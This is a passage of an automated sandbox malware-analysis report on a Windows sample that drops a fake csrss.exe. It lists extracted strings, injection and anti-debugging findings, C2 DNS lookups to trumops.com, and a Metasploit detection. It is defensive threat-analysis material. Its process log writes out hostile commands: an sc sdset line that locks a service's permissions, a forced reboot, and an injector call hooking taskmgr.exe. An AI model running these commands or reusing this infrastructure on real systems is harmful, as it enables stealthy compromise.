TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 3e4a15565a769f217408d9c4b1007394, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b because it is already in the correct state.
Source: 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp Binary or memory string: vmnet/http.(*http2clientConnPool).addConnLocked
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c299ced9de977b3f430798798b7f4515, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 459e5e70c44eb8fcb9d7b4b143aad831, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2 because it is already in the correct state.
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 80db53a4564878a8cdff9a7ca652d3fe, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: csrss.exe Binary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8812e937fcebe77983df86ffdfe7a471, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detectParent (exact match): Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, parent state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp, upd.exe, 00000008.00000002.350773419.0000000000EC7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 908ea1a77ea441bcdf0a5b3d829d1614, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6739fa9f684abbea4b2e76cf14a0a1f4, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 23bad0369164ebf4f04ee41a74386028, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2d446151824b69a919c7d5646f0806b8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, csrss.exe Binary or memory string: AhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, new state: Off

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019BE1D4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D9D3C GetProcessHeap, 36_2_00007FF7019D9D3C
Enables debug privileges
Source: C:\Users\user\Desktop\upd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BD8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 36_2_00007FF7019BD8BC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019BE1D4
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019C543C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE37C SetUnhandledExceptionFilter, 36_2_00007FF7019BE37C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BDE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_00007FF7019BDE24

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle, 36_2_00007FF7019B27F0
Performs DNS TXT record lookups
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: logs.trumops.com
Source: Traffic DNS traffic detected: queries for: 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to behavior
Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progman
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 36_2_00007FF7019D9A24
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D0A8C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 36_2_00007FF7019D94A4
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D940C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D933C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW, 36_2_00007FF7019D96F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW, 36_2_00007FF7019D98F8
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 36_2_00007FF7019D9848
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: try_get_function,GetLocaleInfoW, 36_2_00007FF7019D0FD0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 36_2_00007FF7019D8FF0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5140 cpuid 36_2_00007FF7019D5140
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 36_2_00007FF7019BE0C8

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Remote Access Functionality:

barindex
Yara detected Metasploit Payload
Source: Yara match File source: 11.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs